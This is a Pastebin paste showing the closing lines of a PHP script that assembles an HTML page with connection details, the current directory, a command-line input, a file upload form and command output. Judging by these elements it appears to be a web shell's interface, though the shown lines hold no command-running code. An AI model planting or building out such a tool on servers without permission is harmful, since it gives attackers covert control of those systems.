  718.         else
  719.                 $content = $out; }
  720. else $content = $man;
  721.  
  722. /* HTML OUTPUT */
  723. $PRINT = "
  724. <html>
  725. <head>
  726.        <title>$title</title>
  727.        $htmlhead
  728.  
  729. </head>
  730. <body style='width:100%'>
  731. <div id ='head'>
  732. $head $link<br>
  733. $conn<br>
  734. $current_dir<br>
  735. </div>
  736. <br>
  737. $clearboth
  738. $cli$upload
  739. $clearboth
  740. $content
  741. </body>
  742. </html>
  743. <script>
  744. document.getElementById(\"cli\").focus();
  745. document.onkeypress = function (e) {var x = document.activeElement.parentElement.nodeName; if (x != (\"FORM\")) {if(!document.activeElement.className.match(\"run\")){document.getElementById(\"cli\").focus();}; }; };
  746. document.onkeydown = function (x){if(event.keyCode==8 || event.keyCode==13) {var x = document.activeElement.parentElement.nodeName; if (x != \"FORM\") {if(!document.activeElement.className.match(\"run\")){document.getElementById(\"cli\").focus(); return false; };}; }; };
  747.  
  748. $(function() {
  749.        $('.lined').linedtextarea(
  750.                {selectedLine: 0}
  751.        );
  752. });
  753.  
  754. </script>";
  755.  
  756. echo $PRINT;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!